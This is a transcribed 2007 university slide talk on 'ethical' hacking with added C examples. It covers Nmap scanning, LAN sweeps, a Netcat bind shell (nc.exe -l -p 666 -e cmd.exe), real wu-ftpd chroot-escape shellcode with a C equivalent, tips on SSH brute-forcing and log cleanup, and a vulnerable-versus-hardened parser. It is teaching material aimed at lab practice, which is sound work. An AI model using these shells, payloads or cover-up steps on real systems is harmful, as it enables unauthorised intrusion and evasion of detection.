Security & “Ethical” Hacking Luke Arntson Central Washington University Winter 2007 Presentation #2 – Advanced Scanning & Exploitation
Introduction Again “Ethical” hacking. Do you sniff before you taste? Patience, persistence, some other motivational p-word… Have phun; getting frustrated is normal.
About Me
Overview Advanced scanning with Nmap (as seen in The Matrix Reloaded); local IP sweeping and its importance; Netcat rooting, a simple shell; identifying the station (operating system); brief exploit talk and shellcode; exploits via JPGs, PNGs, MP3s, etc.; conclusion.
Advanced Scanning (Nmap) OK, we have acquired an IP (or a range of them) and we want to find out some information about that system. We will use a very popular program named Nmap. Almost every Linux distribution packages it; on Windows you need to download Nmap plus the WinPcap driver it uses to send and capture raw packets.
Advanced Scanning (Nmap) Let's look at some of the scan techniques Nmap provides (from nmap -h): -sS/sT/sA/sW/sM: TCP SYN/Connect()/ACK/Window/Maimon scans; -sU: UDP scan; -sN/sF/sX: TCP Null, FIN and Xmas scans; --scanflags <flags>: customize TCP scan flags; -sI <zombie host[:probeport]>: idle scan; -sO: IP protocol scan; -b <ftp relay host>: FTP bounce scan. One port-scan type is used per run; -sS needs root (it sends raw packets), while -sT works as any user because it only calls connect(). What we will add on top of the port scan is version detection, -sV, which is not a scan type of its own: it connects to each open port and probes it to identify the service and version in use.
Advanced Scanning (Nmap) So let's run a -sV scan along with -v for verbose output and -O for OS detection (-O also needs root or Administrator, since it fingerprints the TCP/IP stack with crafted packets).
Advanced Scanning (Nmap) Lots of output, but we can sort through it for VERY important details. First: we have all the open ports, along with which service and version each one is running. Port 139 (NetBIOS session service, i.e. Windows file sharing) is very interesting. Second: we also found out the operating system: Windows 98 SE. More on that later.
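What a -sT scan and the first step of -sV actually do on the wire, as an added example written for this page (it is not Nmap code and not from the presentation): each probe completes a full TCP three-way handshake, then reads whatever the service sends on its own. Assumptions: IPv4, POSIX sockets on Linux, and a service that speaks first (FTP, SMTP and SSH send a banner; HTTP waits for the client, so its banner stays empty). The host, port range and timeout are command-line arguments I chose for the example.

```c
/* Added example, not from the presentation or from Nmap: a TCP connect()
 * scan with banner grabbing.  Each probe completes a full three-way
 * handshake (what Nmap's -sT does), then reads whatever the service
 * volunteers (the first thing Nmap's -sV does).  POSIX sockets, IPv4. */
#define _GNU_SOURCE
#include <arpa/inet.h>
#include <errno.h>
#include <netinet/in.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <unistd.h>

enum port_state { PORT_ERROR = -1, PORT_CLOSED = 0, PORT_OPEN = 1 };

/* Probe ip:port.  Returns PORT_OPEN (handshake completed), PORT_CLOSED
 * (RST, i.e. ECONNREFUSED) or PORT_ERROR (bad address, socket error, or
 * no answer within timeout_ms, which usually means a firewall is dropping
 * the packets).  On PORT_OPEN, copies up to banner_len-1 bytes the
 * service sent unprompted into banner; empty string if it sent none. */
static int probe_port(const char *ip, int port, int timeout_ms,
                      char *banner, size_t banner_len)
{
    if (banner && banner_len)
        banner[0] = '\0';

    struct sockaddr_in sa;
    memset(&sa, 0, sizeof sa);
    sa.sin_family = AF_INET;
    sa.sin_port = htons((uint16_t)port);
    if (port < 1 || port > 65535 || inet_pton(AF_INET, ip, &sa.sin_addr) != 1)
        return PORT_ERROR;

    int s = socket(AF_INET, SOCK_STREAM, 0);
    if (s < 0)
        return PORT_ERROR;

    /* Same timeout for connect() (honoured via SO_SNDTIMEO on Linux) and
     * for the banner read, so a filtered port cannot stall the scan. */
    struct timeval tv = { timeout_ms / 1000, (timeout_ms % 1000) * 1000 };
    setsockopt(s, SOL_SOCKET, SO_SNDTIMEO, &tv, sizeof tv);
    setsockopt(s, SOL_SOCKET, SO_RCVTIMEO, &tv, sizeof tv);

    if (connect(s, (struct sockaddr *)&sa, sizeof sa) != 0) {
        int err = errno;
        close(s);
        return err == ECONNREFUSED ? PORT_CLOSED : PORT_ERROR;
    }

    if (banner && banner_len > 1) {
        ssize_t n = recv(s, banner, banner_len - 1, 0);   /* -1 on timeout */
        banner[n > 0 ? (size_t)n : 0] = '\0';
    }
    close(s);
    return PORT_OPEN;
}

/* Scan ports first..last on one host, print the open ones and return how
 * many were open.  A real scanner would run the probes in parallel. */
static int scan_range(const char *ip, int first, int last, int timeout_ms)
{
    int open_count = 0;
    char banner[128];
    for (int p = first; p <= last; p++) {
        if (probe_port(ip, p, timeout_ms, banner, sizeof banner) == PORT_OPEN) {
            open_count++;
            printf("%s:%d open banner=%s\n", ip, p, banner);
        }
    }
    return open_count;
}

int main(int argc, char **argv)
{
    if (argc != 4) {
        fprintf(stderr, "usage: %s <ipv4> <first-port> <last-port>\n", argv[0]);
        return 2;
    }
    printf("%d open port(s)\n",
           scan_range(argv[1], atoi(argv[2]), atoi(argv[3]), 500));
    return 0;
}
```

Because every probe is a complete connection, the target's service logs each one, which is exactly why Nmap defaults to the half-open -sS scan when it has raw-socket privileges.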
Protection from Nmap Keep the firewall up if you are not a server and not hosting anything: a host that drops unsolicited packets gives the scanner very little to work with. Beyond that there is not much you can do, and Nmap can be extremely stealthy with advanced techniques (slow timing, decoy addresses, idle scans bounced off a third host). It is scary how much information a single scan can acquire about you.
Local IP Sweeping The LAN is generally the weakest network: open ports, open boxes, free IPs, easy sweeps. The vast majority of people assume the other computers on the LAN are not hostile, but compromise one wireless router and bam…
Using Angry IP Scanner Again! Angry IP Scanner is a script-kiddie tool, but it works very well and is faster than a full Nmap scan for a plain host sweep. Grab our local IP on the network, say 192.168.5.100, so the range to sweep is 192.168.5.0/24 (192.168.5.*). Use Angry IP Scanner just to find live peers on the network; this is VERY useful once you hold a compromised wireless router or a compromised system behind one.
We Have Local Victims! Okay, we have local victims, so we can now run Nmap against each one. When a host ignores pings, use -P0 (-Pn in current Nmap releases): it skips host discovery and scans anyway, which is what you need against a firewall that drops ICMP. It does not bypass the firewall's port filtering; it only stops Nmap from giving up before it starts. Once we know operating systems and open ports, we can use online vulnerability databases such as www.securityfocus.com to locate exploits!
Importance of Local Sweeps Compromised routers = compromised systems that are vulnerable from the inside only: the router's NAT and firewall hide services from the Internet, not from the LAN. Plant a full-control rootkit on a computer behind a router and you have LAN access… hence local IP sweeping. Worms often spread inside a network (commercial, government, etc.) using exactly these LAN sweeps.
Netcat Rooting (Simple Shell) Now we want to see what kind of access a shell really gives on a system, shell meaning a command prompt on another computer. Netcat is a very useful raw TCP/UDP client/server that can also double as a nice shell. A Windows version is free to download, and most Linux distributions ship nc already; note that only some builds (nc.traditional and the Windows port among them) support the -e option used below, and the OpenBSD netcat does not.
Client/Server Determine which computer you want a shell on and put nc.exe somewhere on it. Then run nc.exe with the following parameters: nc.exe -l -p 666 -e cmd.exe. This tells Netcat to listen on TCP port 666 and, when a client connects, run cmd.exe with its input and output attached to the connection. The victim is the server here, so this is a bind shell: anyone who can reach port 666 gets the prompt, because Netcat asks for no authentication at all.
Client Connection The client now connects to the server with the matching command: nc.exe 192.168.77.2 666. And voilà! A Netcat shell over the network.
Why Netcat Root? A nice way to get your first root, and easy to expand on. The potential is HUGE once the -e <program> option is used. Netcat is open source, so you can read the source to understand exactly how it does this: on Unix it dup2()s the socket over the child's stdin, stdout and stderr and then execs the program. This also works on Unix; just replace cmd.exe with a Unix shell such as /bin/sh ;)
Identify Station Continuation of Nmap OS discovery. Once we have found a target, what operating system is it running? nmap -O will usually tell you, unless the computer has a firewall on: the fingerprint needs responses from at least one open and one closed port, and a firewall that drops everything leaves Nmap guessing.
Importance of OS ID Exploitation, and the choice of exploits/roots, always depends on the OS. Do we look for likely exploits, take a more aggressive approach, or leave it? For example, Linux servers often have an SSH server open: we can either run nmap -sV to get the exact version and look for a matching exploit, or try to brute-force passwords. You need to know what you are attacking, especially when cleaning up after a successful hack (log files, e-mail reports of floods or brute-force attempts, rootkits, etc.).
Brief Exploits & Shellcode Exploits come in all sorts of languages and sizes. Some simply run once against an IP; others take options and offsets (the addresses the exploit needs for a particular build of the vulnerable program). Exploits are the way into a system; shellcode is what runs AFTER the exploit succeeds. Shellcode varies from hacker to hacker, and experienced ones keep a set of useful payloads on hand.
Example Shellcode used by the wu-ftpd 2.6.0 remote root exploit

```c
char linuxcode[]= /* Lam3rZ chroot() code */
"\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80\x31\xc0\x31\xdb"
"\x43\x89\xd9\x41\xb0\x3f\xcd\x80\xeb\x6b\x5e\x31\xc0\x31"
"\xc9\x8d\x5e\x01\x88\x46\x04\x66\xb9\xff\xff\x01\xb0\x27"
"\xcd\x80\x31\xc0\x8d\x5e\x01\xb0\x3d\xcd\x80\x31\xc0\x31"
"\xdb\x8d\x5e\x08\x89\x43\x02\x31\xc9\xfe\xc9\x31\xc0\x8d"
"\x5e\x08\xb0\x0c\xcd\x80\xfe\xc9\x75\xf3\x31\xc0\x88\x46"
"\x09\x8d\x5e\x08\xb0\x3d\xcd\x80\xfe\x0e\xb0\x30\xfe\xc8"
"\x88\x46\x04\x31\xc0\x88\x46\x07\x89\x76\x08\x89\x46\x0c"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xb0\x0b\xcd\x80\x31\xc0"
"\x31\xdb\xb0\x01\xcd\x80\xe8\x90\xff\xff\xff\xff\xff\xff"
"\x30\x62\x69\x6e\x30\x73\x68\x31\x2e\x2e\x31\x31";
```

This is x86 machine code that makes Linux system calls directly (each mov al, <number>; int 0x80 pair is one call). It regains uid 0 with setreuid(0,0), creates a directory, chroot()s into it, chdir()s up past the ftp daemon's chroot jail, chroot()s again at the real root and execve()s /bin/sh, giving the attacker a root shell outside the jail. The trailing bytes are the string "0bin0sh1..11", which the code patches in place into "bin", ".." and "/bin/sh" before using them. This is public knowledge; just type the following into Google: wuftpd exploit filetype:c
More on Shells Later Writing shellcode is an entirely different topic; in a later presentation we will go into how exploit authors work out which machine code to use and where to inject it. Shellcode is scary to look at, because if you do not know the machine code or the system it is intended for there is no way to tell what it does short of disassembling it, and it can compromise a system. Never run shellcode you have not read.
Exploits via JPGs, PNGs, MP3s Exploits come in many varieties; it only takes one unchecked string copy or one bad size check to make a program vulnerable. All sorts of file formats have been vulnerable, for example the famous GDI+ JPEG vulnerability (MS04-028, 2004), which executed code just from viewing a JPEG.
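One way to read the byte string on the previous slide without a disassembler, and the point about shellcode being opaque unless you decode it, as an added example written for this page: Linux/x86 payloads of this era issue every system call as mov al, NR; int 0x80 (bytes b0 NR cd 80), so scanning for that idiom recovers the call chain. The byte string is the one from the slide; the syscall-name table, the pattern scan and the C rendering of the escape are mine, and the rendering is my reading of the bytes, not code from the exploit.

```c
/* Added example, written for this page: reading the Lam3rZ chroot()
 * shellcode from the slide without a disassembler.  The byte string is
 * the one on the slide; everything else is this example's own code. */
#define _GNU_SOURCE
#include <stddef.h>
#include <stdio.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

static const unsigned char lam3rz[] =
    "\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80\x31\xc0\x31\xdb"
    "\x43\x89\xd9\x41\xb0\x3f\xcd\x80\xeb\x6b\x5e\x31\xc0\x31"
    "\xc9\x8d\x5e\x01\x88\x46\x04\x66\xb9\xff\xff\x01\xb0\x27"
    "\xcd\x80\x31\xc0\x8d\x5e\x01\xb0\x3d\xcd\x80\x31\xc0\x31"
    "\xdb\x8d\x5e\x08\x89\x43\x02\x31\xc9\xfe\xc9\x31\xc0\x8d"
    "\x5e\x08\xb0\x0c\xcd\x80\xfe\xc9\x75\xf3\x31\xc0\x88\x46"
    "\x09\x8d\x5e\x08\xb0\x3d\xcd\x80\xfe\x0e\xb0\x30\xfe\xc8"
    "\x88\x46\x04\x31\xc0\x88\x46\x07\x89\x76\x08\x89\x46\x0c"
    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xb0\x0b\xcd\x80\x31\xc0"
    "\x31\xdb\xb0\x01\xcd\x80\xe8\x90\xff\xff\xff\xff\xff\xff"
    "\x30\x62\x69\x6e\x30\x73\x68\x31\x2e\x2e\x31\x31";

#define LAM3RZ_LEN (sizeof lam3rz - 1)     /* drop the literal's trailing NUL */

/* Linux i386 syscall numbers this payload uses (asm/unistd_32.h). */
static const char *syscall_name(int nr)
{
    switch (nr) {
    case 1:  return "exit";
    case 11: return "execve";
    case 12: return "chdir";
    case 39: return "mkdir";
    case 61: return "chroot";
    case 63: return "dup2";
    case 70: return "setreuid";
    default: return "?";
    }
}

/* Scan for b0 NR cd 80.  Stores the NR of each hit in out (at most max)
 * and returns the count.  A heuristic, not a disassembler: a data byte
 * could match, and a call set up with "mov eax, imm32" would be missed. */
static size_t find_syscalls(const unsigned char *code, size_t len,
                            int *out, size_t max)
{
    size_t n = 0;
    for (size_t i = 0; i + 3 < len && n < max; i++)
        if (code[i] == 0xb0 && code[i + 2] == 0xcd && code[i + 3] == 0x80)
            out[n++] = code[i + 1];
    return n;
}

/* The 12 data bytes the "call" at the end leaves for the "pop esi".  The
 * code patches them in place into "bin" (mkdir), ".." (chdir) and
 * "/bin/sh" (execve) before using them. */
static const char *payload_string(void)
{
    return (const char *)lam3rz + LAM3RZ_LEN - 12;
}

/* The same eight calls as plain C: the classic chroot() escape.  After
 * chroot("bin") the cwd is still outside the new root, so ".." climbs to
 * the real / and a second chroot(".") pins it there.  Needs uid 0 inside
 * a chroot; only reached with --escape, never by the tests. */
static int chroot_escape_equivalent(void)
{
    setreuid(0, 0);                 /* 70: be root, in case the daemon dropped it */
    dup2(1, 2);                     /* 63: stderr follows stdout to the socket */
    mkdir("bin", 0777);             /* 39: somewhere to chroot into */
    chroot("bin");                  /* 61: new root below us, cwd unchanged */
    for (int i = 0; i < 255; i++)   /* 12: climb; the loop counter is cl */
        chdir("..");
    chroot(".");                    /* 61: the real root is the root again */
    char *argv[] = { "/bin/sh", NULL };
    execve("/bin/sh", argv, NULL);  /* 11: the shell */
    return 0;                       /* 1: exit(0) if execve failed */
}

int main(int argc, char **argv)
{
    if (argc > 1 && strcmp(argv[1], "--escape") == 0)   /* lab chroot, as root */
        return chroot_escape_equivalent();
    int nrs[16];
    size_t n = find_syscalls(lam3rz, LAM3RZ_LEN, nrs, 16);
    printf("%zu syscalls, data string \"%s\"\n", n, payload_string());
    for (size_t i = 0; i < n; i++)
        printf("  int 0x80 #%zu: %d (%s)\n", i + 1, nrs[i], syscall_name(nrs[i]));
    return 0;
}
```

The pattern scan is a quick triage, not proof of behaviour: arguments are set up by the instructions between the hits, so the final word still comes from a disassembler or from stepping through the bytes in a throwaway VM.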
GDI+ Jpg vulnerability Posted on Sept. 30, 2004: “In the exploit attempts against AIM users, intruders post a copy of an infected JPEG image to their user profile and then send instant messages to other AIM users enticing them to view that profile. When someone views such a profile and the JPEG image loads the viewing user's computer is then infected. Still other exploits have been discovered. According to Symantec two other Trojans, “Moo” and “Backdoor.Roxe” are spreading although neither appears to have spread to more than 50 computers at the time of this writing.” – Mark Joseph Edwards, http://www.windowsitpro.com/Articles/ArticleID/44075/44075.html?Ad=1
Exploits via JPGs, PNGs, MP3s Other vulnerabilities in PNG and MP3 files have appeared in the wild. One MP3 exploit used the file's tag header to run shellcode in Winamp as soon as the metadata was loaded. A PNG exploit in MSN Messenger (MS05-009) let an attacker put shellcode in a PNG and display it as a buddy icon to other users.
Just because it's media… Just because you are viewing a JPG, PNG, MP3 or WMV, you are still running a parser over bytes somebody else chose, and that parser can be exploited. Many people think exploits come only in a few forms, scripts, TCP/UDP injections or executables, but there are many ways in.
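The "bad size check" bug class behind the media-file exploits above, as an added example written for this page. The format is a toy constructed for the purpose (a 1-byte marker, a 2-byte big-endian length that counts itself, as JPEG segment lengths do, then payload, with 0xD9 ending the file); it is not real JFIF, PNG or ID3 parsing and does not reproduce the exact GDI+ bug. The vulnerable parser is shown beside a hardened one, and the sample files are constructed.

```c
/* Added example, written for this page: one bad length check in a file
 * parser, before and after.  Toy segment format, not a real codec. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define SEG_MAX 64                     /* what the parser's buffer holds */
#define END_MARKER 0xD9

static uint16_t be16(const uint8_t *p)
{
    return (uint16_t)((p[0] << 8) | p[1]);
}

/* The arithmetic the unsafe parser relies on, isolated so its failure can
 * be observed without running the overflow: uint16_t promotes to int, so
 * a length field of 1 gives 1 - 2 == -1, which becomes SIZE_MAX. */
static size_t unsafe_copy_len(uint16_t len)
{
    return (size_t)(len - 2);
}

/* BEFORE: trusts the length field.  For len < 2 the copy length wraps,
 * and for len - 2 > SEG_MAX it is simply too big; either way memcpy runs
 * past out (and past the file).  Only ever call this with trusted input. */
static size_t parse_segment_unsafe(const uint8_t *in, uint8_t out[SEG_MAX])
{
    size_t n = unsafe_copy_len(be16(in + 1));
    memcpy(out, in + 3, n);
    return n;
}

/* AFTER: every number taken from the file is checked against both the
 * destination (SEG_MAX) and the source (in_len) before it is used.
 * Returns the payload length, or -1 for a malformed segment. */
static long parse_segment_safe(const uint8_t *in, size_t in_len,
                               uint8_t out[SEG_MAX])
{
    if (in_len < 3)                     /* need marker + length field */
        return -1;
    uint16_t len = be16(in + 1);
    if (len < 2)                        /* length must at least cover itself */
        return -1;
    size_t n = (size_t)len - 2;         /* cannot wrap now */
    if (n > SEG_MAX)                    /* destination bound */
        return -1;
    if (n > in_len - 3)                 /* source bound: truncated file */
        return -1;
    memcpy(out, in + 3, n);
    return (long)n;
}

/* Walk a whole file with the safe parser.  Returns the number of segments
 * before END_MARKER, or -1 if any segment is malformed or the end marker
 * never comes. */
static int walk_segments(const uint8_t *buf, size_t buf_len)
{
    uint8_t tmp[SEG_MAX];
    size_t off = 0;
    int count = 0;
    while (off < buf_len) {
        if (buf[off] == END_MARKER)
            return count;
        long n = parse_segment_safe(buf + off, buf_len - off, tmp);
        if (n < 0)
            return -1;
        off += 3 + (size_t)n;
        count++;
    }
    return -1;
}

/* Constructed samples: a benign 5-byte comment, a segment whose length
 * field is 1 (the underflow case), and one that claims more bytes than
 * the file has. */
static const uint8_t good_file[]  = { 0xFE, 0x00, 0x07, 'h', 'e', 'l', 'l', 'o', END_MARKER };
static const uint8_t evil_file[]  = { 0xFE, 0x00, 0x01, 'A', END_MARKER };
static const uint8_t trunc_file[] = { 0xFE, 0x00, 0x20, 'x' };

int main(void)
{
    printf("good:  %d segment(s)\n", walk_segments(good_file, sizeof good_file));
    printf("evil:  %d (rejected; the unsafe parser would memcpy %zu bytes)\n",
           walk_segments(evil_file, sizeof evil_file), unsafe_copy_len(1));
    printf("trunc: %d (rejected)\n", walk_segments(trunc_file, sizeof trunc_file));
    return 0;
}
```

The fix is not the one extra comparison but the habit: a length read from a file is attacker input, and it has to be checked against what the buffer can hold and against what the file actually contains before any arithmetic is done on it, in a type that cannot wrap.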
Resources If this type of information interests you, there are many safe online resources: www.hackthissite.org, a friendly playground for web hackers; www.phrack.org, a very good place for articles with great pieces of info; www.securityfocus.com, some of the best up-to-date info about vulnerabilities and exploits.
Conclusion Again, I emphasize: just because I am showing you this does NOT make it legal. Scanning government systems with Nmap and getting caught can land you fines and possible jail time. Running exploits with shellcode you do not trust could expose your test system to a virus or backdoor you do not know about. Remember, finding exploits that work is tedious; not everything you find online works every time. Set up a fun box (something like Mandrake Linux) on an isolated network, install some vulnerable software on it, e.g. wu-ftpd 2.6.0, and see if you can break in. Have fun; it takes work, so don't give up!
Thank You For Your Time! Feel free to email me any questions/comments at  [email_address]
